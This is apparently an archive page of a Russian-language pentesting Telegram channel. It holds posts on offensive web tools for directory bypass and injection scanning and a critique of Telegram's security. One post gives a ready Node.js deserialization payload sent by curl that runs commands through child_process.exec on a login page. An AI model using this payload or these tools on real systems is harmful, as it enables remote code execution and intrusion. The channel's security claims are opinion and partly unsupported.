en
Feedback
Эффект пентестера

Эффект пентестера

Open in Telegram
2 261
Subscribers
No data24 hours
+37 days
-1030 days
Posts Archive
https://github.com/M4DM0e/DirDar bypass forbidden directories - find and identify dir listing - you can use it as directory brute-forcer as well

Backup-Finder — расширение Burp Suite Расширение, которое ищет и просматривает резервные копии, а также старые, временные и неиспользуемые файлы на веб-сервере на наличие конфиденциальной информации. https://github.com/moeinfatehi/Backup-Finder

Sitadel - сканер безопасности веб-приложений написанный на Python. Полезный и простой в использовании инструмент сталкера. Возможности: Собирает информацию о используемых фреймворках, cms, os, языках, серверах и др.вещи на сайте Брутфорс Поддерживает разные инъекции: HTML Injection SQL Injection LDAP Injection XPath Injection Cross Site Scripting (XSS) Remote File Inclusion (RFI) PHP Code Injection Полный список возможностей на GitHub Установка: $ git clone https://github.com/shenril/Sitadel.git $ cd Sitadel $ pip3 install . $ python sitadel.py --help

ApplicationInspector - анализатор исходного кода, созданный для выявления интересующих функций и других характеристик, позволяющих быстро ответить на вопрос "Что в коде?" с помощью статического анализа и механизма правил на основе json. Идеально подходит для сканирования компонентов перед использованием или обнаружения изменений на уровне функций #полезное https://github.com/microsoft/ApplicationInspector

Небезопасный Telegram. С чего все началось? В 2013 году к Дурову пришли с обыском, а когда он захотел безопасно написать своему брату, он якобы не знал о безопасном способе сделать это, о мессенджере, который бы не читали третьи лица. В этом же году началась разработка Telegram и его собственного протокола MTProto. В 2017 мессенджер сменил протокол шифрования с MTProto 1.0 на 2.0, в виду того, что первая версия была частично взломана. В 2018 году начался активный грязный пиар Telegram со стороны его владельца. Сначала Роскомнадзор выслал только анкету для регистрации организации. Дуров же рассказал в своем блоге, что Роскомнадзор требовал выдать ключи дешифровки сообщений (без толковых доказательств, например, публикация письма от Роскомнадзора), хотя о такой просьбе не было и речи. Естественно, этот вброс от Дурова распространили СМИ, даже не перепроверив информацию. Отсюда и пошел миф о конфиденциальности Telegram. Кстати, ещё во времена «ВКонтакте» он заявлял, что не хранит логи на серверах, но после продажи социальной сети оказалось, что на серверах хранилась вся «не хранящаяся» информация. Только в 2019 году появилась возможность скрывать номер телефона; до этого номер был доступен абсолютно всем, и почти все аккаунты, созданные до 2019 года, уже скомпрометированны и не являются анонимными... Позже Telegram официально согласился выдавать личные данные пользователей, а именно: IP-адреса, номер телефона. Кроме этого, Telegram имеет возможность регистрировать и другую информацию; перечисленные выше идентификаторы — это лишь то, что он выдает в официальном порядке, не учитывая закон «Gag Order» (закон о неразглашении). Вот доказательство: https://telegram.org/privacy#8-3-law-enforcement-authorities При этом не учитывается закон Gag order, то есть секретная передача данных спецслужбам. А в странах, где Telegram зарегистрирован как компания, данный закон действует). Подробнее: https://kod.ru/rieklamnaia-platforma-telegram-poluchila" Вопросы к мессенджеру. Телеграм имеет закрытый исходный код серверной части — следовательно, сервера Telegram являются не доверенной средой, на которой могут находиться какие угодно бэкдоры и уязвимости, несмотря на заявления разработчиков (проверить их заявления фактически невозможно). Также из этого вытекает невозможность проверить такие вещи, как: Вся ли информация на серверах зашифрована? Telegram удаляет с серверов все, что удалил пользователь? Telegram не хранит переписку на серверах? Сервер Telegram не может произвести MITM (человек по середине) атаку? Протокол шифрования MTProto 2.0 никогда не подвергался внешнему аудиту безопасности. А конкурсы, которые проводит Telegram по взлому данного протокола, не являются фактическим доказательством безопасности MTProto 2.0 (к тому же сумма выигрыша не так уж и существенная, чтобы привлечь серьёзные агентства). Регистрация по номеру телефона — это недопустимо в ориентированном на информационную безопасность мессенджере. Актуальный исходный код клиента выкладывают с запозданием. В Google Play и App Store код вообще может отличаться. Весь трафик идет только через сервера Telegram. Даже в секретных чатах. Это косвенно подтверждает их уязвимость к MITM. Telegram для iOS издает компания Telegram LLC, а для Android — Telegram FZ-LLC. Компании основаны в США и Великобритании, где действует так называемый Gag order. Он предполагает, в том числе, что правоохранительные органы могут запретить разработчикам разглашать сведения о том, что те предоставляли им информацию. 🔓 Сервер Telegram может произвести MITM-атаку на протокол Диффи-Хеллмана, который используется для сквозного шифрования. В виду того, что весь трафик идёт только через сервер, и если сервер теоретически произвёл MITM-атаку на указанный протокол (подменив числа генератора псевдослучайных чисел), то секретный чат, хоть и выборочно, но может быть скомпрометирован (проще говоря, даже имея сквозное шифрование, вся информация в секретных чатах читается). Стандартные чаты полностью доступны для сервера.

Node.js Deserelization Exploit для хоста с login page curl -X POST -H "Content-Type: application/json" --data '{"username":"_$$ND_FUNC$$_function (){require(\'child_process\').exec(\'touch /etc/passwd\');}()"}' https://example.com/login | httpx -s

Слава перуну

https://github.com/KanatnikovMax/znanie-drevnix Распространите молву про великий кибер русский язык братцы

Серия_Образовательная_манга_44_выпусков.torrent0.32 KB

Repost from ChatGPT
Мы рады сообщить вам, что в данном чате вы имеете уникальную возможность оставлять свои комментарии и предложения по улучшени
Мы рады сообщить вам, что в данном чате вы имеете уникальную возможность оставлять свои комментарии и предложения по улучшению нашего бота. Ваше мнение - важное для нас и поможет сделать ЧатГПТ еще лучше! Мы всегда стремимся к совершенству и готовы услышать любые ваши идеи и предложения. Если у вас есть какие-либо комментарии о работе бота, идеи по добавлению новых функций или просто хотите поделиться своими впечатлениями - вы всегда можете сделать это в этом чате. Наша команда разработчиков внимательно просматривает все ваши комментарии и предложения, и старается воплотить их в реальность, чтобы улучшить ваш опыт использования ЧатГПТ. Мы ценим ваше участие и с нетерпением ждем ваших идей! Не стесняйтесь делиться своим мнением - вместе мы сможем сделать ЧатГПТ еще удобнее, эффективнее и интереснее! https://t.me/chatgpt_discus

Как хакеры и мошенники отмывают криптовалюту и что с этим можно сделать? Обработали и выложили записи на канал OSINT Mindset в двух языках. Приятного просмотра! RUS: https://www.youtube.com/watch?v=JmyvCMFacTg ENG: https://www.youtube.com/watch?v=dP3XGGCpwLk

+1
🐱 Nyarch Linux 23.05 Wayland (updated) #stable #wayland live password:
live